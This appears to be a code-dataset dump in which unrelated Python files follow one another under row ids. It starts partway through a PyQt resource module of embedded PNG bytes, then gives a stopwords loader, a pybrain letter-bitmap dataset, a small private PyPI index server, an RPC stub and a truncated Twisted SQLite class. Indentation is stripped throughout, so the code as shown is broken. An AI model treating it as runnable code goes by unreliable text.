\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x18\x00\x00\x00\x18\x08\x06\x00\x00\x00\xe0\x77\x3d\xf8\
\x00\x00\x00\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\
\x00\x00\x00\x20\x63\x48\x52\x4d\x00\x00\x7a\x26\x00\x00\x80\x84\
\x00\x00\xfa\x00\x00\x00\x80\xe8\x00\x00\x75\x30\x00\x00\xea\x60\
\x00\x00\x3a\x98\x00\x00\x17\x70\x9c\xba\x51\x3c\x00\x00\x00\x06\
\x62\x4b\x47\x44\x00\xff\x00\xff\x00\xff\xa0\xbd\xa7\x93\x00\x00\
\x00\x09\x70\x48\x59\x73\x00\x00\x0d\xd7\x00\x00\x0d\xd7\x01\x42\
\x28\x9b\x78\x00\x00\x00\x07\x74\x49\x4d\x45\x07\xe4\x09\x19\x08\
\x30\x34\x91\xe1\x1a\xae\x00\x00\x05\x5d\x49\x44\x41\x54\x48\xc7\
\xdd\x95\x4d\x88\x9d\x57\x19\xc7\x7f\xef\xf7\x7d\xe7\xde\xb9\x33\
\x99\xef\xc9\x24\x4d\x1a\xd3\x4e\x1d\x9b\x59\x44\x0c\xba\xb0\x68\
\xa0\x76\x15\x37\x8a\xb8\x30\x45\x44\x10\xf1\x03\x5c\x99\x4d\x11\
\x04\x17\x82\x0b\x91\x5a\xe8\xca\x8d\x90\xd2\x9d\x8a\x22\xb8\xb2\
\xa2\x42\x5b\xd2\x26\xd1\x26\x69\x12\x93\x4c\xe6\xde\x99\xb9\x33\
\x73\xe7\x7e\xbf\xf7\x7d\xcf\x39\xcf\xe3\xe2\xde\x49\x8d\x58\x71\
\xed\x03\x7f\xce\xe1\x2c\xce\xef\xf9\x3f\xcf\x73\x38\x1e\x1f\x12\
\x2f\x7f\xeb\x02\xf1\xec\x71\x6c\xb7\x49\x69\x66\x99\x22\x9c\x60\
\xd0\xef\x91\xed\xd7\xf1\x87\x1d\xde\x7a\xd0\xe2\xfc\x33\x0b\x7c\
\xfb\x95\xdf\xf0\xdf\x22\xf8\x4f\x87\x3f\xff\xee\x17\x90\xce\x0e\
\xd3\xab\x9f\x64\x3e\x36\x95\x81\x84\x9f\xe8\x75\xbb\xe7\x8b\xac\
\x77\xd6\x13\x37\x9d\x52\xb4\xfb\x1a\x0f\xe7\x13\xcb\xf9\xb3\x4f\
\xf3\x87\x2b\x77\x3e\x14\xe0\xbd\x72\xf9\x75\xa6\xaa\x55\x96\x66\
\x67\xa9\xa4\x29\xbe\xef\xd3\xdb\xba\xcf\x9d\x95\x17\x28\xfd\xee\
\xa5\xcf\xde\xdf\x6e\x5e\xda\xdd\x6f\x7e\x5c\x55\x13\x0f\x3c\x67\
\x8d\xf1\xd5\xfd\x2d\x25\xff\xc9\x8f\xcf\xd5\x7f\xfd\xdb\x13\x3f\
\xd0\x78\xf6\x18\x59\x96\xd1\xed\x76\xd9\xdf\x6f\xb2\x59\xab\x71\
\xfb\xf6\x1d\xb6\xb7\xea\x84\x9e\xe7\x79\x61\x10\x44\x49\x14\xf9\
\xe5\x34\xf5\xe3\x28\xf2\x67\xd6\xce\xb2\xf9\xfa\x0f\x9f\xbf\x7e\
\xb7\xf6\xf2\x20\xcf\xcb\x9f\x3a\xff\xc2\x70\xe5\xe4\xe9\xe0\xc1\
\x83\x87\xfe\xb5\x2b\x6f\xe9\xee\x83\xdb\x67\x3b\xd6\xfd\xe2\x7b\
\x7f\x5d\xbe\xf4\x95\xf3\x6b\xbf\xea\x0d\x32\xf2\x3c\x17\x40\x44\
\x45\x44\x44\x55\xd5\x01\x7d\xef\xa7\xbf\x7c\xed\xa4\xc0\x8f\x82\
\x20\x58\x4c\xe3\x24\xf4\x7d\x2f\xf2\x86\xfd\x70\xf3\xca\x9f\x4f\
\x1d\x74\xbb\x73\x5f\xfc\xea\x37\xf3\xd5\xd5\xd5\xa4\xdd\xe9\xf2\
\xc6\x9f\xfe\xc2\xb5\xbf\xdf\xa0\xdb\x69\xd9\x41\xed\x56\xe8\x99\
\xac\x37\xf5\xc4\x47\xeb\x2d\xe3\xbb\x7c\x98\x4b\x5e\xe4\xae\xc8\
\x73\xc9\xf3\x42\xf2\x3c\xaf\x5b\x53\x7c\x27\x0c\xc3\x60\x32\x2b\
\xcc\xf3\x85\xb1\xf3\x59\x36\xc4\x39\xc1\x6f\x6f\x53\xaf\xd7\xf8\
\xf4\xe7\xbf\xc4\xfa\xb3\xcf\x26\x9e\x07\x6d\x55\xaa\xd5\x0a\x73\
\x33\x47\xf0\x83\x20\xcc\xba\x4b\xf4\x36\xde\xab\xec\xdf\xb8\xfe\
\x74\x93\x49\x54\x05\x54\x51\x55\x00\x54\x75\x09\x95\x52\x98\x26\
\x09\xb9\x71\xd6\x88\xc5\x59\x87\x88\x45\x5a\x7b\x04\x49\xca\xd2\
\xb1\x13\x74\x7a\x7d\xac\xb3\x38\x11\xd2\x52\x89\xea\x64\x85\xbc\
\x28\x28\x4d\x4e\xd3\xf1\x23\xc8\x33\x82\xb8\x8c\x11\x1d\x03\xe4\
\x10\xe0\x50\x25\x34\x85\x51\x15\xc1\x5a\x8b\x38\x41\xac\xc5\x64\
\x19\x7e\x10\xb2\x77\xd0\xe6\xee\xc6\x43\x92\x28\x22\x0a\x03\xc4\
\x39\xc2\x30\xc0\xf7\x3d\x02\xdf\xc7\x29\x38\x6b\x20\x12\x54\x14\
\x18\x03\x14\x14\x05\x15\xc2\x41\x96\x21\xa2\xe3\xec\x05\x67\x1d\
\x8a\x47\x31\x1c\xb0\xf1\x70\x93\x61\x5e\x50\x99\x48\x99\x48\x12\
\x0e\x5a\x6d\xb2\x6c\x88\x29\x0a\xac\x29\x28\x86\x7d\xc0\xc3\x89\
\xa0\x87\xe5\x51\x41\x47\x16\x46\x80\x7e\x96\x11\x04\x11\xce\x5a\
\x54\x15\xe3\x04\xa2\x14\xc9\x07\x34\x36\xee\x12\x97\x26\x28\x8a\
\x82\x2c\x8e\x69\xec\xed\xd1\x6a\xb5\xc9\x86\x39\xed\xdd\x3a\xc3\
\x5e\x87\x64\x6a\x0e\x6b\x05\xe5\x10\x70\xd8\x87\xd1\x3e\xcc\xb2\
\x21\x49\x02\xce\x39\x54\x15\x67\x2d\x52\xaa\x12\xa5\x65\x1a\xb7\
\xae\x82\x1f\x32\xbb\x72\x82\x34\x49\x68\xec\xee\x8d\x66\x7d\x7b\
\x93\xbd\x7b\x37\x48\xfc\x90\x5c\x13\xac\x38\xfc\x51\xdd\xc7\xa5\
\xf9\x17\x40\x51\x18\x3c\x3f\xc0\x5a\x87\x8a\xe0\xac\xc5\x12\x12\
\x2e\x9c\x84\xee\x75\xee\xbf\xfd\x47\x76\xee\x2d\x92\x56\x67\x69\
\xee\x36\xe8\x36\x1b\xf4\x9b\x3b\x94\xf1\xf8\xcc\x62\x99\x5b\x7d\
\xc3\xbd\xb0\x4a\xd3\xf4\x1f\xcb\x5e\x55\xf1\x50\x42\x63\x0c\x41\
\x10\x8c\x32\x17\xc5\x5a\x87\x73\x0e\x1b\x4d\x52\x39\x75\x06\x7d\
\x78\x9b\xf6\xd6\x06\x3b\xff\xb8\x89\x35\x16\x51\x21\x2a\x4d\x50\
\x89\x27\xa8\x86\xc2\x7a\xf5\x34\x13\xfd\x9c\x1b\x31\x34\xb2\xce\
\xa3\xcc\x0f\xfb\x10\x5a\x6b\xb1\xc6\x62\x9d\x43\x9c\xe0\xdc\x08\
\x20\xce\x61\xfd\x94\xe0\xe8\x33\x1c\x99\x3d\x8e\x1b\xf6\x11\x51\
\x0e\x0e\x0e\xd8\xda\xd9\xe5\xc0\x78\x4c\xf5\x16\x58\x4d\x53\x3e\
\x32\x59\x46\xdb\x82\xc4\x8e\xc6\x70\x0c\x19\x0d\x2b\xa1\x73\x0e\
\xeb\x1c\xce\x5a\x9c\x93\xb1\x93\xf1\x34\xe9\xc8\x91\x25\x42\xa2\
\x2a\x22\xc2\xc0\xb5\x31\xd6\x81\x07\xef\x99\x26\xa1\xe7\xf3\x84\
\x5f\xe6\x58\x5c\x41\x73\x41\x4b\x4a\x23\x6b\x8f\x5d\x28\xa1\xb3\
\x0e\x17\xd8\x0f\xc6\xd4\x09\x22\x0e\xeb\xec\xbf\x39\x92\x31\xd8\
\xa2\x2a\x78\x78\xb4\xf3\x1e\xef\x8a\x83\x64\x91\xa3\x12\xb3\xa0\
\x09\x4a\x15\x2d\x09\x8d\xac\xed\x21\x82\x2f\xce\x79\x6e\x24\x8c\
\xb1\x38\x67\xc7\xcd\x1e\xbb\xb2\x6e\x24\x37\x5a\xc5\xb9\x0f\x5e\
\xac\x42\x3b\xef\xf3\xce\x70\x8b\xba\x5f\x20\x4e\x38\x52\xf8\xac\
\x6a\x95\xc9\x30\xd1\xcc\xe4\x9e\x6f\x8a\xc2\x16\x79\xd1\x36\x85\
\x79\xfc\x42\xeb\x46\x0d\xb7\xf6\xd1\xe5\xce\x8d\x5c\x1e\x3e\x2a\
\x55\xc1\xf3\xa0\x3d\xec\xf1\xce\x70\x8b\x9d\xd8\xe1\xfb\xb0\x5a\
\xda\xeb\x2d\x98\x9d\x57\x37\xb6\x5b\xb5\x70\x6f\xab\x76\x57\x94\
\x17\x81\x73\x61\x14\xaf\x07\x61\xb4\xe6\x07\xe1\x49\x55\xe6\x14\
\x12\x15\x79\x54\xba\xc3\xbd\xa2\x78\x80\xaa\xa0\x82\x35\x45\xde\
\xa8\x75\xda\x37\x8b\xb8\x7b\xed\x73\x4b\xcb\xd1\xf2\x74\xfd\xed\
\xa7\x1a\xf7\x2e\xbf\x76\xf1\xb9\x3c\x4c\xcb\xe5\x62\x7e\xf9\xd8\
\x9b\x5f\xfb\xfe\x4b\x6f\x9e\x9b\xf2\xc2\x99\xf9\xc5\xe9\x85\x95\
\xe3\x2b\xe5\xc9\xa9\xd5\xb8\x94\x9e\x89\xe2\xe4\x4c\x10\x44\x4f\
\xf9\x41\xb0\xec\xfb\x41\x55\x55\x02\x67\x6d\x6e\x4d\xb1\x93\xf5\
\xfb\xef\x0f\x07\xfd\x77\x07\xbd\xee\xd5\x22\xcf\x6f\xd5\x61\xf3\
\xea\xfb\x57\x9b\xaa\x97\xf3\x9b\xcf\x7d\x9d\x2f\xff\xec\x0d\xbc\
\xc7\xbe\x37\xcf\x63\x61\xe5\x38\xa7\xd7\xd6\xb9\x70\xf1\x1b\x5c\
\xba\x78\xc1\x07\x2a\x33\xf3\x4b\x0b\xd5\x23\xb3\xa7\xca\xd5\xa9\
\xb5\x3c\xeb\x2f\xed\xed\xd4\x6a\xfd\x76\xe7\xbe\x31\x45\x03\x68\
\x01\x9d\xb1\xb2\xf5\xa3\x73\xd2\xec\xb5\xd8\xec\x58\xfe\xa7\x08\
\xa3\x88\x27\x57\x3f\xc6\xab\xbf\xbf\x02\xe0\x03\xd1\x58\xf1\x58\
\xe1\xf8\xfc\xff\x34\xfe\x09\x50\xc9\xce\x14\x61\x6a\x10\x46\x00\
\x00\x00\x25\x74\x45\x58\x74\x64\x61\x74\x65\x3a\x63\x72\x65\x61\
\x74\x65\x00\x32\x30\x32\x30\x2d\x30\x37\x2d\x31\x39\x54\x30\x33\
\x3a\x33\x39\x3a\x31\x39\x2b\x30\x30\x3a\x30\x30\x9d\x70\x4c\x6c\
\x00\x00\x00\x25\x74\x45\x58\x74\x64\x61\x74\x65\x3a\x6d\x6f\x64\
\x69\x66\x79\x00\x32\x30\x31\x39\x2d\x30\x31\x2d\x30\x38\x54\x31\
\x37\x3a\x35\x34\x3a\x30\x36\x2b\x30\x30\x3a\x30\x30\xfa\xae\x64\
\x88\x00\x00\x00\x20\x74\x45\x58\x74\x73\x6f\x66\x74\x77\x61\x72\
\x65\x00\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6d\x61\x67\x65\x6d\
\x61\x67\x69\x63\x6b\x2e\x6f\x72\x67\xbc\xcf\x1d\x9d\x00\x00\x00\
\x18\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x44\x6f\x63\x75\
\x6d\x65\x6e\x74\x3a\x3a\x50\x61\x67\x65\x73\x00\x31\xa7\xff\xbb\
\x2f\x00\x00\x00\x18\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\
\x49\x6d\x61\x67\x65\x3a\x3a\x48\x65\x69\x67\x68\x74\x00\x35\x31\
\x32\x8f\x8d\x53\x81\x00\x00\x00\x17\x74\x45\x58\x74\x54\x68\x75\
\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\x3a\x57\x69\x64\x74\x68\
\x00\x35\x31\x32\x1c\x7c\x03\xdc\x00\x00\x00\x19\x74\x45\x58\x74\
\x54\x68\x75\x6d\x62\x3a\x3a\x4d\x69\x6d\x65\x74\x79\x70\x65\x00\
\x69\x6d\x61\x67\x65\x2f\x70\x6e\x67\x3f\xb2\x56\x4e\x00\x00\x00\
\x17\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x4d\x54\x69\x6d\
\x65\x00\x31\x35\x34\x36\x39\x37\x30\x30\x34\x36\xc4\x38\x95\x8f\
\x00\x00\x00\x13\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x53\
\x69\x7a\x65\x00\x31\x35\x32\x30\x39\x38\x42\xe5\x15\x0c\xcb\x00\
\x00\x00\x5a\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x55\x52\
\x49\x00\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\x64\x61\x74\x61\x2f\x77\
\x77\x77\x72\x6f\x6f\x74\x2f\x77\x77\x77\x2e\x65\x61\x73\x79\x69\
\x63\x6f\x6e\x2e\x6e\x65\x74\x2f\x63\x64\x6e\x2d\x69\x6d\x67\x2e\
\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x63\x6e\x2f\x66\x69\x6c\x65\
\x73\x2f\x31\x30\x36\x2f\x31\x30\x36\x36\x32\x33\x38\x2e\x70\x6e\
\x67\x39\x3a\x2a\x0d\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\
\x82\
"
qt_resource_name = b"\
\x00\x03\
\x00\x00\x77\x47\
\x00\x70\
\x00\x6e\x00\x67\
\x00\x04\
\x00\x06\xfa\x5e\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\
\x00\x0b\
\x05\xff\xda\x07\
\x00\x31\
\x00\x31\x00\x33\x00\x37\x00\x32\x00\x36\x00\x34\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x0e\
\x02\xd3\xb9\x87\
\x00\x64\
\x00\x65\x00\x61\x00\x6c\x00\x20\x00\x73\x00\x6d\x00\x61\x00\x6c\x00\x6c\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x07\
\x09\xc7\x57\xa7\
\x00\x73\
\x00\x65\x00\x74\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x0b\
\x0f\x29\x4e\xc7\
\x00\x70\
\x00\x72\x00\x65\x00\x76\x00\x69\x00\x65\x00\x77\x00\x2e\x00\x70\x00\x6e\x00\x67\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x0c\x00\x02\x00\x00\x00\x04\x00\x00\x00\x03\
\x00\x00\x00\x36\x00\x00\x00\x00\x00\x01\x00\x00\x01\xe2\
\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x00\x58\x00\x00\x00\x00\x00\x01\x00\x00\x05\x91\
\x00\x00\x00\x6c\x00\x00\x00\x00\x00\x01\x00\x00\x0c\xbc\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x0c\x00\x02\x00\x00\x00\x04\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x36\x00\x00\x00\x00\x00\x01\x00\x00\x01\xe2\
\x00\x00\x01\x74\x56\xe3\x3f\xc3\
\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x68\x2e\xd5\xff\x38\
\x00\x00\x00\x58\x00\x00\x00\x00\x00\x01\x00\x00\x05\x91\
\x00\x00\x01\x74\xc4\x73\x3a\x8f\
\x00\x00\x00\x6c\x00\x00\x00\x00\x00\x01\x00\x00\x0c\xbc\
\x00\x00\x01\x74\xc4\x73\xad\x43\
"
qt_version = [int(v) for v in QtCore.qVersion().split('.')]
if qt_version < [5, 8, 0]:
rcc_version = 1
qt_resource_struct = qt_resource_struct_v1
else:
rcc_version = 2
qt_resource_struct = qt_resource_struct_v2
def qInitResources():
QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
|
8,119 | dad4e14da734f2e2329f4cbe064c73c82a4ae27c | import os as os
import io as io
import re
class Stopwords:
def __init__(self, base_dir='data'):
self.base_dir = base_dir
def load_stopwords(self, base_dir=None, stopwords_file='stopwords.csv'):
# Load stopwords from file.
if base_dir is not None:
self.base_dir = base_dir
filename = os.path.join(self.base_dir, stopwords_file)
self.stopwords = []
pattern = re.compile('[\r\n]')
with open(filename, 'r', encoding='utf-8') as fin:
self.stopwords = [re.sub(pattern, '', word.lower()) for word in fin]
return self.stopwords |
8,120 | a2569ccd509fa755f4cad026f483bcf891c6fb41 | from pybrain3.datasets import SupervisedDataSet
inputDataSet = SupervisedDataSet(35, 20) #Creating new DataSet
#A
inputDataSet.addSample(( #Adding first sample to dataset
-1, 1, 1, 1, -1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, 1, 1, 1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1
),
(1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0))
#B
inputDataSet.addSample((
1, 1, 1, 1, -1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, 1, 1, 1, -1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, 1, 1, 1, -1
),
(0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0))
#C
inputDataSet.addSample((
-1, 1, 1, 1, -1,
1, -1, -1, -1, 1,
1, -1, -1, -1, -1,
1, -1, -1, -1, -1,
1, -1, -1, -1, -1,
1, -1, -1, -1, 1,
-1, 1, 1, 1, -1
),
(0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0))
#D
inputDataSet.addSample((
1, 1, 1, 1, -1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, 1, 1, 1, -1
),
(0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0))
#F
inputDataSet.addSample((
1, 1, 1, 1, 1,
1, -1, -1, -1, -1,
1, -1, -1, -1, -1,
1, 1, 1, 1, -1,
1, -1, -1, -1, -1,
1, -1, -1, -1, -1,
1, -1, -1, -1, -1
),
(0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0))
#G
inputDataSet.addSample((
-1, 1, 1, 1, -1,
1, -1, -1, -1, 1,
1, -1, -1, -1, -1,
1, -1, 1, 1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
-1, 1, 1, 1, -1
),
(0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0))
#H
inputDataSet.addSample((
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, 1, 1, 1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1
),
(0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0))
#I
inputDataSet.addSample((
-1, -1, 1, -1, -1,
-1, -1, 1, -1, -1,
-1, -1, 1, -1, -1,
-1, -1, 1, -1, -1,
-1, -1, 1, -1, -1,
-1, -1, 1, -1, -1,
-1, -1, 1, -1, -1
),
(0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0))
#K
inputDataSet.addSample((
1, -1, -1, -1, 1,
1, -1, -1, 1, -1,
1, -1, 1, -1, -1,
1, 1, -1, -1, -1,
1, -1, 1, -1, -1,
1, -1, -1, 1, -1,
1, -1, -1, -1, 1
),
(0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0))
#U
inputDataSet.addSample((
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
-1, 1, 1, 1, -1
),
(0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0))
#M
inputDataSet.addSample((
1, -1, -1, -1, 1,
1, 1, -1, 1, 1,
1, -1, 1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1
),
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0))
#E
inputDataSet.addSample((
1, 1, 1, 1, -1,
1, -1, -1, -1, -1,
1, -1, -1, -1, -1,
1, 1, 1, -1, -1,
1, -1, -1, -1, -1,
1, -1, -1, -1, -1,
1, 1, 1, 1, -1
),
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0))
#L
inputDataSet.addSample((
1, -1, -1, -1, -1,
1, -1, -1, -1, -1,
1, -1, -1, -1, -1,
1, -1, -1, -1, -1,
1, -1, -1, -1, -1,
1, -1, -1, -1, -1,
1, 1, 1, 1, -1
),
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0))
#O
inputDataSet.addSample((
1, 1, 1, 1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, 1, 1, 1, 1
),
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0))
#P
inputDataSet.addSample((
1, 1, 1, -1, -1,
1, -1, -1, 1, -1,
1, -1, -1, 1, -1,
1, 1, 1, -1, -1,
1, -1, -1, -1, -1,
1, -1, -1, -1, -1,
1, -1, -1, -1, -1
),
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0))
#R
inputDataSet.addSample((
1, 1, 1, -1, -1,
1, -1, -1, 1, -1,
1, -1, -1, 1, -1,
1, 1, 1, -1, -1,
1, -1, 1, -1, -1,
1, -1, -1, 1, -1,
1, -1, -1, -1, 1
),
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0))
#T
inputDataSet.addSample((
1, 1, 1, 1, 1,
-1, -1, 1, -1, -1,
-1, -1, 1, -1, -1,
-1, -1, 1, -1, -1,
-1, -1, 1, -1, -1,
-1, -1, 1, -1, -1,
-1, -1, 1, -1, -1
),
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0))
#W
inputDataSet.addSample((
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, -1, -1, 1,
1, -1, 1, -1, 1,
1, 1, -1, 1, 1,
1, -1, -1, -1, 1
),
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0))
#X
inputDataSet.addSample((
-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1,
1, -1, -1, -1, 1,
-1, 1, -1, 1, -1,
-1, -1, 1, -1, -1,
-1, 1, -1, 1, -1,
1, -1, -1, -1, 1
),
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0))
#Y
inputDataSet.addSample((
-1, -1, -1, -1, -1,
-1, -1, -1, -1, -1,
1, -1, -1, -1, 1,
-1, 1, -1, 1, -1,
-1, -1, 1, -1, -1,
-1, 1, -1, -1, -1,
1, -1, -1, -1, -1
),
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1)) |
8,121 | bd25b97de78f04510e43f13d356eb6c0025e223d | #!/usr/bin/python
"""
An extensible private pypi index.
NOTES ON PACKAGE NAMES
----------------------
MPyPi tries the following when it does not find a package
with the given name in the index:
- replaces all _ with - and
- lowercases the package name
"""
from __future__ import print_function
from __future__ import unicode_literals
import cgi
import re
from .util import PY2, PY3
if PY2:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
else:
from http.server import BaseHTTPRequestHandler, HTTPServer
# --- format strings
ENTRY_FMT = """<a href="{url}">{name}</a><br/>\n"""
PAGE_FMT = """<html><head><title>Simple MPyPi Index</title><meta name="api-version" value="2" /></head><body>\n"""
PKG_PAGE_FMT = """<!DOCTYPE html><html><head><title>Links for {name}</title></head><body><h1>Links for {name}</h1>\n"""
# ------------------------------------------------------------------------------
# Snippet from pip._vendor.packaging.core
# ------------------------------------------------------------------------------
_canonicalize_regex = re.compile(r"[-_.]+")
def canonicalize_name(name):
# This is taken from PEP 503.
return _canonicalize_regex.sub("-", name).lower()
# ------------------------------------------------------------------------------
# ------------------------------------------------------------------------------
# INTERNALLY USED FUNCTIONS
# ------------------------------------------------------------------------------
# --- page formatting functions
def page_index(packages):
yield PAGE_FMT
for p in packages:
name = p.name
url = name
yield ENTRY_FMT.format(url=canonicalize_name(p.name), name=name)
def page_package(package):
yield PKG_PAGE_FMT.format(name=package.name)
for (name, link) in package.links:
yield ENTRY_FMT.format(name=name, url=link)
def msg_404(pkg_name):
return '<html><body> Package <b>{}</b> does not exist.</body></html>\n'.format(cgi.escape(pkg_name))
def make_request_handler(index):
"""
Arguments
---------
index: dict-like
- allows key lookups
- has a values() function that returns a list of
package instances.
- supports get
"""
root_paths = {'', '/'}
class PyPiRequestHandler(BaseHTTPRequestHandler):
def get_package(self, package_name):
package = index.get(package_name)
return package
def write_unicode(self, text):
self.wfile.write(bytearray(text, encoding='utf-8'))
def do_GET(self):
print("GET", self.path)
if self.path in root_paths:
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
# serve index page
for line in page_index(index.values()):
self.write_unicode(line)
else:
# follow pip standard of using lowercase names
package_name = self.path.strip('/')
package = self.get_package(package_name)
if not package:
self.send_response(404)
self.send_header('Content-type','text/html')
self.end_headers()
self.write_unicode(msg_404(package_name))
return
# serve package page
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
# serve index page
for line in page_package(package):
self.write_unicode(line)
return PyPiRequestHandler
def main(packages, index=None, host='', port=7890):
# optionally create an index
if index is None:
index = {}
for p in packages:
index[canonicalize_name(p.name)] = p
try:
server = HTTPServer((host, port), make_request_handler(index))
print('Started mpypi on port {}'.format(port))
server.serve_forever()
except KeyboardInterrupt:
print('^C received, shutting down the web server')
server.socket.close()
if __name__ == '__main__':
main([])
|
8,122 | 74f85732b4e1f4ef2b82a48818cbaedb18a56083 | from pydis.datastruct.sds import SdsImp
class RPCStub(object):
def __init__(self):
pass
def SET(self, key, value):
self
print("{}: {}".format(key, value))
|
8,123 | 45c1510d19af0979326a1b9975ec363b0b80a291 | import pkg_resources
from twisted.enterprise import adbapi
from twisted.internet import defer
# Start a logger with a namespace for a particular subsystem of our application.
from twisted.logger import Logger
log = Logger("database")
class Database:
def __init__(self, context, db_filename="database.sqlite"):
# Get full path and filename for database
session_files = context["session_files"]
db_filename = session_files.session_dir / db_filename
# Note if database already exists
database_exists = db_filename.is_file()
# Callback for every connection that is established to the
# database
def setup_connection(connection):
# Turn on foreign key constraints
cursor = connection.cursor()
cursor.execute("PRAGMA foreign_keys = ON;")
# # Turn on column names in rows
# import sqlite3
# connection.row_factory = sqlite3.Row
# Open a connection to the database. SQLite will create the file if
# it doesn't already exist.
dbpool = adbapi.ConnectionPool(
"sqlite3",
db_filename,
cp_openfun=setup_connection,
check_same_thread=False # See https://twistedmatrix.com/trac/ticket/3629
)
# If the database did not exist, initialise the database
if not database_exists:
print("Database requires initialisation")
self._db_ready = dbpool.runInteraction(self._initialise_database)
def on_success(data):
log.info("Database successfully initialised")
return dbpool
def on_error(data):
log.error(f"Failed to initialise the server's database: {data}")
reactor = context["reactor"]
reactor.stop()
self._db_ready.addCallback(on_success)
self._db_ready.addErrback(on_error)
else:
# Database exists already
self._db_ready = defer.Deferred()
self._db_ready.callback(dbpool)
# Check that database is the correct version
expected_version = 4
def check_version(cursor):
cursor.execute("SELECT version FROM Version")
row = cursor.fetchone()
if row is None:
raise Exception("No version found in Version table of database")
